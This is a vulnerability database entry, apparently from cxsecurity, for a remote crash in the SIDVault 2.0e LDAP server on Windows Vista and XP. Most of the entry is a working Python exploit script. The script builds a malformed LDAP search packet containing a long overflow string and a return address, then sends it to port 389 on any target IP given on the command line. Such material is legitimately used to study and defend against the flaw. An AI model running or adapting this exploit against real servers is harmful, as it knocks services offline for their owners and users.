SIDVault version 2.0e Vista remote crash ldap

2009.09.15
Credit: Joxean Koret
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python # # $ ./ldap.py <target IP> # # SIDVault 2.0e Vista Remote Crash Vulnerability (sidvault.exe ) # Tested on Vista Home premium SP1 Windows XP ,SP1,SP2,SP3 # Coded by:asheesh anaconda # Discovery: Joxean Koret # Group DarkShinners import sys import socket addr = "\x33\xbf\x96\x7c" healthpacket = '\x41'*4095 + addr evilpacket = '0\x82\x10/\x02\x01\x01c\x82\x10(\x04\x82\x10\x06dc=' evilpacket += healthpacket evilpacket += '\n\x01\x02\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0bobjectClass0\x00' print "[+] Sending evil packet" print "[+] Wait ladp is getting crashh!!!!!!!!!!!!" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 389)) s.send(evilpacket) s.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top